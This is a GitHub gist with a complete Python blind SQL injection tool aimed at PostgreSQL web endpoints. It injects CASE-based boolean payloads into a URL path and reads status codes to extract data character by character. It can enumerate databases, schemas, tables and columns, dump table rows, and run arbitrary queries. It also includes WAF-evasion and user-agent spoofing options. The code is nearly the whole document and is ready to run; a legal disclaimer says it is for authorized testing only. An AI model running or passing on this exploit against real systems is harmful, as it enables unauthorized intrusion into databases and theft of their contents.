Skip to content

Instantly share code, notes, and snippets.

@mcipekci
Created July 22, 2025 17:32
Show Gist options
  • Select an option

  • Save mcipekci/80fbe744dc1fa478893f8f870c3927e4 to your computer and use it in GitHub Desktop.

Select an option

Save mcipekci/80fbe744dc1fa478893f8f870c3927e4 to your computer and use it in GitHub Desktop.
import requests
import urllib.parse
import threading
import time
import random
import argparse
import sys
import json
import os
from concurrent.futures import ThreadPoolExecutor, as_completed
# --- Configuration (can be overridden in the class constructor) ---
TARGET_URL_BASE = "https://host/api"
URL_SUFFIX = "/endpoint"
TRUE_STATUS_CODE = 200
FALSE_STATUS_CODE = 500
ASCII_MIN = 32 # Space
ASCII_MAX = 126 # Tilde (~)
MAX_STRING_LENGTH = 200
MAX_COUNT = 5000
DEFAULT_THREADS = 15
SESSION_FILE_NAME = "sqli_session.json"
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 17_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36",
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/135.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Android 10; Mobile; rv:116.0) Gecko/116.0 Firefox/116.0",
"Mozilla/5.0 (iPad; CPU OS 17_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/108.0.0.0 Mobile/15E148 Safari/604.1",
]
class BlindSQLiExploiter:
"""
Encapsulates the logic for a blind SQL injection attack, focusing on
PostgreSQL enumeration with session management and optimized algorithms.
This class structure avoids global variables and makes the tool's state
easier to manage.
"""
def __init__(self, args):
"""
Initializes the exploiter with command-line arguments and sets up
the necessary state for execution.
"""
self.args = args
self.verbose = args.verbose
self.threads = getattr(args, 'threads', DEFAULT_THREADS)
self.stealth_mode = args.stealth
self.proxy = args.proxy
# Concurrency and Rate Limiting
self.request_semaphore = threading.Semaphore(self.threads)
self.thread_local = threading.local()
self.print_lock = threading.Lock() # Lock for synchronized printing
# Session and State Management
self.session_data = {}
self.interrupted = threading.Event() # For graceful shutdown on Ctrl+C
if self.proxy:
print(f"[*] Using proxy: {self.proxy}")
# Disable SSL warnings when using a proxy for traffic inspection
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
self._load_and_prepare_session()
if self.stealth_mode:
print("[*] Stealth mode enabled. Using BETWEEN operator (slower, may evade WAFs).")
else:
print("[*] Fast mode enabled. Using '>' operator (faster, may be detected by WAFs).")
def _get_thread_session(self):
"""
Creates and returns a per-thread requests.Session object.
This ensures thread safety and configures proxy and SSL verification.
"""
if not hasattr(self.thread_local, "session"):
session = requests.Session()
if self.proxy:
proxies = {'http': self.proxy, 'https': self.proxy}
session.proxies = proxies
session.verify = False # Disable SSL verification when using a proxy
self.thread_local.session = session
return self.thread_local.session
def _save_session(self, action, progress_info=None):
"""Saves the current operational state to the session file for a specific action."""
# Ensure session_data has a dictionary for the action
if "progress" not in self.session_data:
self.session_data["progress"] = {}
state_to_save = {
"last_command_args": sys.argv[1:],
"progress": self.session_data.get("progress", {})
}
state_to_save["progress"][action] = progress_info or {}
try:
with open(SESSION_FILE_NAME, 'w') as f:
json.dump(state_to_save, f, indent=4)
except Exception as e:
print(f"\n[!] Error saving session state: {e}")
def _load_and_prepare_session(self):
"""
Loads a previous session from the session file if the current
command-line arguments match the saved ones and the user agrees.
"""
if not os.path.exists(SESSION_FILE_NAME):
return
try:
with open(SESSION_FILE_NAME, 'r') as f:
loaded_session = json.load(f)
except (json.JSONDecodeError, IOError) as e:
print(f"[!] Could not load session file '{SESSION_FILE_NAME}': {e}. Starting fresh.")
os.remove(SESSION_FILE_NAME)
return
# Resume only if the command is exactly the same
if loaded_session.get("last_command_args") == sys.argv[1:]:
prompt = input(f"[+] Found saved session. Resume? (Y/n): ").lower()
if prompt in ['y', 'yes', '']:
self.session_data = loaded_session.get("progress", {})
print("[+] Resuming session...")
return
print("[*] A stale session file was found but does not match the current command.")
prompt = input(" Clear the old session and start fresh? (Y/n): ").lower()
if prompt in ['y', 'yes', '']:
self.clear_session_file()
@staticmethod
def clear_session_file():
"""A static method to remove the session file."""
if os.path.exists(SESSION_FILE_NAME):
try:
os.remove(SESSION_FILE_NAME)
print(f"[+] Session file '{SESSION_FILE_NAME}' cleared.")
except OSError as e:
print(f"[!] Error clearing session file: {e}")
def _print_config_summary(self, action_description, sql_expr=None):
"""Prints a summary of the current configuration for the user."""
print("\n" + "="*60)
print(f"[*] Action: {action_description}")
print("-" * 60)
if sql_expr:
# To avoid overly long lines, truncate the SQL expression if needed
display_sql = (sql_expr[:75] + '...') if len(sql_expr) > 78 else sql_expr
print(f"[*] Target SQL: {display_sql}")
print(f"[*] Threads: {self.threads}")
print(f"[*] Mode: {'Stealth (BETWEEN operator)' if self.stealth_mode else 'Fast ('>' operator)'}")
print(f"[*] Response Codes: True={TRUE_STATUS_CODE}, False={FALSE_STATUS_CODE}")
print(f"[*] Request Retries: 3 (with exponential backoff)")
print("="*60)
def _make_request(self, sql_condition):
"""
Constructs and sends a single SQL injection request.
Includes robust error handling with exponential backoff for retries.
"""
sql_injection_part = f"||(CASE WHEN ({sql_condition}) THEN '5' ELSE (SELECT 1 UNION SELECT 2) END)||"
encoded_sql = urllib.parse.quote(sql_injection_part, safe='')
full_path_segment = f"value'{encoded_sql}'"
url = TARGET_URL_BASE + full_path_segment + URL_SUFFIX
headers = {"User-Agent": random.choice(USER_AGENTS)}
if self.verbose:
with self.print_lock:
print(f"[VERBOSE] SQL: {sql_condition}")
session = self._get_thread_session()
retries = 3
delay = 1.0 # Initial delay for retries
for attempt in range(retries):
if self.interrupted.is_set(): return -1
try:
with self.request_semaphore:
response = session.get(url, headers=headers, timeout=15)
return response.status_code
except requests.RequestException as e:
with self.print_lock:
print(f"[*] Request error (Attempt {attempt+1}/{retries}): {e}. Retrying in {delay:.1f}s...")
time.sleep(delay)
delay *= 2 # Exponential backoff
return -1 # Failed after all retries
def _check_condition(self, sql_condition):
"""
Evaluates a boolean SQL condition by making a request and checking the status code.
Returns True, False, or None if an error occurs.
"""
status = self._make_request(sql_condition)
if status == TRUE_STATUS_CODE:
return True
elif status == FALSE_STATUS_CODE:
return False
else:
with self.print_lock:
print(f"[!] Unexpected status code: {status}. The target might not be vulnerable or is blocking requests.")
self.interrupted.set()
return None
# --- Dispatcher Methods ---
def _fetch_scalar_value(self, query_template, max_val, description):
"""Dispatcher: Chooses the scalar value fetching strategy."""
print(f"[*] Discovering {description}...")
if self.stealth_mode:
return self._fetch_scalar_value_stealth(query_template, max_val, description)
else:
return self._fetch_scalar_value_fast(query_template, max_val, description)
def _fetch_char_at_pos(self, sql_expr, pos):
"""Dispatcher: Chooses the character fetching strategy."""
if self.stealth_mode:
return self._fetch_char_at_pos_stealth(sql_expr, pos)
else:
return self._fetch_char_at_pos_fast(sql_expr, pos)
# --- Search Strategy Implementations ---
def _fetch_scalar_value_fast(self, query_template, max_val, description):
"""Fast Mode: Binary search using the '>' operator."""
low, high = 0, max_val
found_val = -1
while low <= high:
if self.interrupted.is_set(): return None
mid = (low + high) // 2
condition = query_template.format(operator='>', value=mid)
result = self._check_condition(condition)
if result is None: return None
if result:
found_val = mid + 1
low = mid + 1
else:
high = mid - 1
if found_val != -1 and self._check_condition(query_template.format(operator='>', value=found_val - 1)):
print(f"[+] Discovered {description}: {found_val}")
return found_val
if self._check_condition(f"({query_template.format(operator='>', value=-1)})"):
if not self._check_condition(f"({query_template.format(operator='>', value=0)})"):
print(f"[+] Discovered {description}: 0")
return 0
print(f"[-] Could not determine {description}.")
return None
def _fetch_scalar_value_stealth(self, query_template, max_val, description):
"""Stealth Mode: Binary search using the 'BETWEEN' operator."""
low, high = 0, max_val
found_val = None
while low <= high:
if self.interrupted.is_set(): return None
mid = (low + high) // 2
# Check for exact match first
condition_exact = query_template.format(operator='BETWEEN', value=f"{mid} AND {mid}")
result_exact = self._check_condition(condition_exact)
if result_exact:
found_val = mid
break
# If not exact, check if value is greater
condition_gt = query_template.format(operator='BETWEEN', value=f"{mid + 1} AND {high}")
result_gt = self._check_condition(condition_gt)
if result_gt:
low = mid + 1
else:
high = mid - 1
if found_val is not None:
print(f"[+] Discovered {description}: {found_val}")
else:
print(f"[-] Could not determine {description}.")
return found_val
def _fetch_char_at_pos_fast(self, sql_expr, pos):
"""Fast Mode: Finds a character using the '>' operator."""
low, high = ASCII_MIN, ASCII_MAX
found_char_code = low # FIX: Initialize to the lowest possible value
while low <= high:
if self.interrupted.is_set(): return None
mid = (low + high) // 2
condition = f"ASCII(SUBSTRING(({sql_expr}), {pos}, 1)) > {mid}"
result = self._check_condition(condition)
if result is None: return '!'
if result:
found_char_code = mid + 1
low = mid + 1
else:
high = mid - 1
# If the loop completes, found_char_code will hold the correct ASCII value.
# This now correctly handles the case where the character is ASCII_MIN.
return chr(found_char_code)
def _fetch_char_at_pos_stealth(self, sql_expr, pos):
"""Stealth Mode: Finds a character using the 'BETWEEN' operator."""
low, high = ASCII_MIN, ASCII_MAX
found_char = None
while low <= high:
if self.interrupted.is_set(): return None
mid = (low + high) // 2
condition_exact = f"ASCII(SUBSTRING(({sql_expr}), {pos}, 1)) BETWEEN {mid} AND {mid}"
result_exact = self._check_condition(condition_exact)
if result_exact:
found_char = chr(mid)
break
condition_gt = f"ASCII(SUBSTRING(({sql_expr}), {pos}, 1)) BETWEEN {mid + 1} AND {high}"
result_gt = self._check_condition(condition_gt)
if result_gt:
low = mid + 1
else:
high = mid - 1
return found_char if found_char else '!'
def _fetch_string(self, sql_expression, description, resume_chars=None):
"""Dumps a single string value from the database, showing progress."""
length_query_template = f"LENGTH(({sql_expression})) {{operator}} {{value}}"
str_len = self._fetch_scalar_value(length_query_template, MAX_STRING_LENGTH, f"Length of {description}")
if str_len is None:
print(f"\n[!] Could not determine length for {description}. The value might be NULL or unreadable.")
return "[UNREADABLE]"
if str_len == 0:
print(f"[!] {description} is empty.")
return ""
result_chars = [None] * str_len
start_pos = 1
if resume_chars:
print(f"[+] Resuming {description} from partial data: {''.join(c if c is not None else '_' for c in resume_chars)}")
for i, char in enumerate(resume_chars):
result_chars[i] = char
start_pos = len(resume_chars) + 1
print(f"[*] Dumping {description}...")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
futures = {executor.submit(self._fetch_char_at_pos, sql_expression, i): i for i in range(start_pos, str_len + 1)}
for future in as_completed(futures):
if self.interrupted.is_set():
[f.cancel() for f in futures]
break
pos = futures[future]
try:
char = future.result()
if char:
result_chars[pos-1] = char
# Update progress on a single line
with self.print_lock:
progress_str = "".join(c if c is not None else '_' for c in result_chars)
sys.stdout.write(f"\r[+] Progress: {progress_str}")
sys.stdout.flush()
except Exception as e:
with self.print_lock:
print(f"[!] Error fetching char at pos {pos}: {e}")
result_chars[pos-1] = '!'
sys.stdout.write("\n") # Move to the next line after progress is done
# Store partial result for session saving on interruption
self.thread_local.last_partial_string = result_chars
if self.interrupted.is_set():
return None
final_string = "".join(c for c in result_chars if c is not None)
if '!' in final_string:
return "[ERROR_DURING_FETCH]"
return final_string
def _fetch_item_list(self, action_name, count_sql, row_sql_template, description_plural, description_singular, resume_state=None):
"""Dumps a list of items (e.g., database names, table names), handling resumption."""
count_query_template = f"({count_sql}) {{operator}} {{value}}"
item_count = self._fetch_scalar_value(count_query_template, MAX_COUNT, f"count of {description_plural}")
if item_count is None: return None
if item_count == 0:
print(f"[+] No {description_plural} found.")
return []
print(f"[+] Found {item_count} {description_plural}.")
dumped_items = resume_state.get("completed_items", []) if resume_state else []
start_offset = len(dumped_items)
if start_offset > 0:
print(f"[+] Resuming from offset {start_offset}. Already found: {dumped_items}")
for i in range(start_offset, item_count):
if self.interrupted.is_set(): break
item_sql = row_sql_template.format(offset=i)
item_desc = f"{description_singular} {i+1}/{item_count}"
# Check for partial item dump from a previous run
partial_chars = resume_state.get("partial_item") if resume_state and resume_state.get("current_offset") == i else None
item = self._fetch_string(item_sql, item_desc, resume_chars=partial_chars)
if item is None: # Interrupted or failed
partial_result = [c for c in self.thread_local.last_partial_string if c is not None] if hasattr(self.thread_local, 'last_partial_string') else []
self._save_session(action_name, {"completed_items": dumped_items, "current_offset": i, "partial_item": partial_result})
return None
dumped_items.append(item)
self._save_session(action_name, {"completed_items": dumped_items})
return dumped_items
# --- Public API Methods for Actions ---
def run(self):
"""Main entry point to execute the specified actions."""
actions_to_run = []
if self.args.banner: actions_to_run.append(self.dump_banner)
if self.args.user: actions_to_run.append(self.dump_user)
if self.args.current_db: actions_to_run.append(self.dump_current_db)
if self.args.dbs: actions_to_run.append(self.dump_databases)
if self.args.schemas: actions_to_run.append(self.dump_schemas)
if self.args.tables: actions_to_run.append(self.dump_tables)
if self.args.columns: actions_to_run.append(self.dump_columns)
if self.args.fetch: actions_to_run.append(self.dump_table_data)
if self.args.query: actions_to_run.append(self.dump_custom_query)
overall_success = True
try:
for action in actions_to_run:
if self.interrupted.is_set():
overall_success = False
break
success = action()
if not success:
overall_success = False
if not self.interrupted.is_set() and overall_success:
self.clear_session_file()
except KeyboardInterrupt:
print("\n[!] Ctrl+C detected. Shutting down and saving progress...")
self.interrupted.set()
except Exception as e:
print(f"\n[CRITICAL ERROR] An unexpected error occurred: {e}")
self.interrupted.set()
def dump_banner(self):
sql_expr = "version()"
self._print_config_summary("Dumping Banner", sql_expr)
resume_state = self.session_data.get("banner", {})
result = self._fetch_string(sql_expr, "Banner", resume_chars=resume_state.get("partial_item"))
if result is not None:
print(f"\n[+] Banner: {result}")
return True
return False
def dump_user(self):
sql_expr = "current_user"
self._print_config_summary("Dumping User", sql_expr)
resume_state = self.session_data.get("user", {})
result = self._fetch_string(sql_expr, "User", resume_chars=resume_state.get("partial_item"))
if result is not None:
print(f"\n[+] Current User: {result}")
return True
return False
def dump_current_db(self):
sql_expr = "current_database()"
self._print_config_summary("Dumping Current DB", sql_expr)
resume_state = self.session_data.get("current_db", {})
result = self._fetch_string(sql_expr, "Current DB", resume_chars=resume_state.get("partial_item"))
if result is not None:
print(f"\n[+] Current Database: {result}")
return True
return False
def dump_custom_query(self):
query = self.args.query
self._print_config_summary("Dumping Custom Query", query)
resume_state = self.session_data.get("query", {})
result = self._fetch_string(f"({query})", "Custom Query", resume_chars=resume_state.get("partial_item"))
if result is not None:
print(f"\n[+] Query Result: {result}")
return True
return False
def dump_databases(self):
self._print_config_summary("Dumping All Databases")
count_sql = "SELECT COUNT(DISTINCT datname) FROM pg_database"
row_sql = "(SELECT DISTINCT datname FROM pg_database ORDER BY datname LIMIT 1 OFFSET {offset})"
dbs = self._fetch_item_list("dbs", count_sql, row_sql, "databases", "Database", self.session_data.get("dbs"))
if dbs is not None:
print("\n[+] Databases Found:")
for db in dbs: print(f" - {db}")
return True
return False
def dump_schemas(self):
db = self.args.database
self._print_config_summary(f"Dumping Schemas from DB '{db}'")
count_sql = f"SELECT COUNT(DISTINCT schema_name) FROM information_schema.schemata WHERE catalog_name = '{db}'"
row_sql = f"(SELECT DISTINCT schema_name FROM information_schema.schemata WHERE catalog_name = '{db}' ORDER BY schema_name LIMIT 1 OFFSET {{offset}})"
schemas = self._fetch_item_list("schemas", count_sql, row_sql, f"schemas in DB '{db}'", "Schema", self.session_data.get("schemas"))
if schemas is not None:
print(f"\n[+] Schemas in '{db}':")
for s in schemas: print(f" - {s}")
return True
return False
def dump_tables(self):
db = self.args.database
self._print_config_summary(f"Dumping Tables from DB '{db}'")
schema_filter = f" AND table_schema = '{self.args.schema}'" if getattr(self.args, 'schema', None) else ""
count_sql = f"SELECT COUNT(DISTINCT table_name) FROM information_schema.tables WHERE table_catalog = '{db}'{schema_filter}"
row_sql = f"(SELECT DISTINCT table_name FROM information_schema.tables WHERE table_catalog = '{db}'{schema_filter} ORDER BY table_name LIMIT 1 OFFSET {{offset}})"
tables = self._fetch_item_list("tables", count_sql, row_sql, f"tables in DB '{db}'", "Table", self.session_data.get("tables"))
if tables is not None:
print(f"\n[+] Tables in '{db}':")
for t in tables: print(f" - {t}")
return True
return False
def dump_columns(self):
db, table = self.args.database, self.args.table
self._print_config_summary(f"Dumping Columns from Table '{table}'")
schema_filter = f" AND table_schema = '{self.args.schema}'" if getattr(self.args, 'schema', None) else ""
count_sql = f"SELECT COUNT(DISTINCT column_name) FROM information_schema.columns WHERE table_catalog = '{db}' AND table_name = '{table}'{schema_filter}"
row_sql = f"(SELECT DISTINCT column_name FROM information_schema.columns WHERE table_catalog = '{db}' AND table_name = '{table}'{schema_filter} ORDER BY column_name LIMIT 1 OFFSET {{offset}})"
columns = self._fetch_item_list("columns", count_sql, row_sql, f"columns in Table '{table}'", "Column", self.session_data.get("columns"))
if columns is not None:
print(f"\n[+] Columns in '{table}':")
for c in columns: print(f" - {c}")
return True
return False
def dump_table_data(self):
"""
Dumps data from a table, supporting specific columns and row ranges.
"""
db, table = self.args.database, self.args.table
self._print_config_summary(f"Fetching data from Table '{table}' in DB '{db}'")
# 1. Determine which columns to fetch
header = []
if self.args.column:
# Use user-specified columns
header = [c.strip() for c in self.args.column.split(',')]
print(f"[*] Using specified columns: {header}")
else:
# Enumerate all columns from the table
print(f"[*] Enumerating columns for table '{table}'...")
schema_filter = f" AND table_schema = '{self.args.schema}'" if getattr(self.args, 'schema', None) else ""
col_count_sql = f"SELECT COUNT(DISTINCT column_name) FROM information_schema.columns WHERE table_catalog = '{db}' AND table_name = '{table}'{schema_filter}"
col_row_sql = f"(SELECT DISTINCT column_name FROM information_schema.columns WHERE table_catalog = '{db}' AND table_name = '{table}'{schema_filter} ORDER BY column_name LIMIT 1 OFFSET {{offset}})"
header = self._fetch_item_list("fetch", col_count_sql, col_row_sql, f"columns in Table '{table}'", "Column")
if not header:
print(f"[!] No columns found or specified for table '{table}'. Aborting.")
return False
# 2. Get total row count
row_count_sql = f"SELECT COUNT(*) FROM \"{table}\""
row_count_query_template = f"({row_count_sql}) {{operator}} {{value}}"
total_rows = self._fetch_scalar_value(row_count_query_template, MAX_COUNT, f"row count of {table}")
if total_rows is None:
print(f"[!] Could not determine row count for table '{table}'. Aborting data fetch.")
return False
if total_rows == 0:
print(f"[+] Table '{table}' is empty.")
return True
# 3. Determine row range for fetching
start_row = self.args.start
# If --stop is not provided, its value is None. Default to total_rows in that case.
stop_row = self.args.stop if self.args.stop is not None else total_rows
start_idx = max(0, start_row - 1)
end_idx = min(total_rows, stop_row)
if start_idx >= end_idx:
print(f"[!] Invalid row range. Start row ({start_row}) is not before stop row ({stop_row}). Nothing to fetch.")
return True
print(f"\n[+] Table '{table}' has {total_rows} rows. Fetching rows from {start_idx + 1} to {end_idx}.")
all_rows_data = []
for r_idx in range(start_idx, end_idx):
if self.interrupted.is_set(): break
print(f"[*] Fetching row {r_idx + 1}/{total_rows}...")
row_data = []
for c_idx, col_name in enumerate(header):
if self.interrupted.is_set(): break
cell_sql = f"CAST((SELECT \"{col_name}\" FROM \"{table}\" OFFSET {r_idx} LIMIT 1) AS TEXT)"
cell_value = self._fetch_string(cell_sql, f"R{r_idx+1}:C{c_idx+1} ({col_name})")
if cell_value is None: # Interruption
print("\n[!] Data fetch interrupted.")
return False
row_data.append(cell_value)
all_rows_data.append(row_data)
# Print final table if not interrupted
if not self.interrupted.is_set() and all_rows_data:
# Calculate column widths for neat printing
col_widths = [max(len(str(item)) for item in col) for col in zip(*([header] + all_rows_data))]
header_line = " | ".join(f"{h:<{w}}" for h, w in zip(header, col_widths))
print("\n" + header_line)
print("-" * len(header_line))
for row in all_rows_data:
print(" | ".join(f"{str(item):<{w}}" for item, w in zip(row, col_widths)))
if self.interrupted.is_set():
return False
return True
def parse_arguments():
"""Sets up and parses command-line arguments."""
parser = argparse.ArgumentParser(
description="""Advanced Blind SQL Injection Tool for PostgreSQL.
Educational purposes ONLY. Do not use on systems without explicit permission.""",
formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument("--banner", action="store_true", help="Dump PostgreSQL version banner.")
parser.add_argument("--user", action="store_true", help="Dump current database user.")
parser.add_argument("--current-db", action="store_true", help="Dump current database name.")
parser.add_argument("--dbs", action="store_true", help="Dump all database names.")
parser.add_argument("--schemas", action="store_true", help="Dump all schemas in a database (requires -D).")
parser.add_argument("--tables", action="store_true", help="Dump all tables in a database (requires -D).")
parser.add_argument("--columns", action="store_true", help="Dump all columns in a table (requires -D, -T).")
parser.add_argument("--fetch", action="store_true", help="Fetch data from a table (requires -D, -T).")
parser.add_argument("--query", type=str, metavar="SQL", help="Execute a custom SQL query and dump the scalar result.")
parser.add_argument("--flush-session", action="store_true", help="Clear any saved session progress and exit.")
parser.add_argument("-D", "--database", type=str, help="Database name for --schemas, --tables, --columns, --fetch.")
parser.add_argument("-T", "--table", type=str, help="Table name for --columns, --fetch.")
parser.add_argument("--schema", type=str, help="Schema name to filter by (optional).")
parser.add_argument("-C", "--column", type=str, help="Comma-separated columns to fetch (for --fetch only).")
parser.add_argument("--start", type=int, default=1, help="Start row for --fetch (1-based, default: 1).")
parser.add_argument("--stop", type=int, help="Stop row for --fetch (inclusive).")
parser.add_argument("--threads", type=int, default=DEFAULT_THREADS, help=f"Number of concurrent threads (default: {DEFAULT_THREADS}).")
parser.add_argument("--verbose", action="store_true", help="Show SQL payloads being sent.")
parser.add_argument("--stealth", action="store_true", help="Use BETWEEN operator for WAF evasion (slower).")
parser.add_argument("--proxy", type=str, help="Proxy to use for requests (e.g., http://127.0.0.1:8080).")
args = parser.parse_args()
# --- Argument Validation ---
action_args = ['banner', 'user', 'current_db', 'dbs', 'schemas', 'tables', 'columns', 'fetch', 'query', 'flush_session']
if not any(getattr(args, arg) for arg in action_args if isinstance(getattr(args, arg), bool) or getattr(args, arg) is not None):
parser.error("No action specified. Please choose an action like --banner, --dbs, --fetch, etc.")
if args.schemas and not args.database: parser.error("--schemas requires -D/--database.")
if args.tables and not args.database: parser.error("--tables requires -D/--database.")
if args.columns and (not args.database or not args.table): parser.error("--columns requires -D/--database and -T/--table.")
if args.fetch and (not args.database or not args.table): parser.error("--fetch requires -D/--database and -T/--table.")
if (args.column or args.start != 1 or args.stop is not None) and not args.fetch:
parser.error("--column, --start, and --stop can only be used with --fetch.")
return args
if __name__ == "__main__":
print("="*60)
print(" Advanced Blind SQL Injection Tool")
print("="*60)
print("[!] LEGAL DISCLAIMER: This tool is for authorized testing and")
print(" educational purposes ONLY. Unauthorized use on systems is")
print(" illegal. The user is responsible for their actions.")
print("="*60)
args = parse_arguments()
if args.flush_session:
BlindSQLiExploiter.clear_session_file()
sys.exit(0)
exploiter = BlindSQLiExploiter(args)
exploiter.run()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment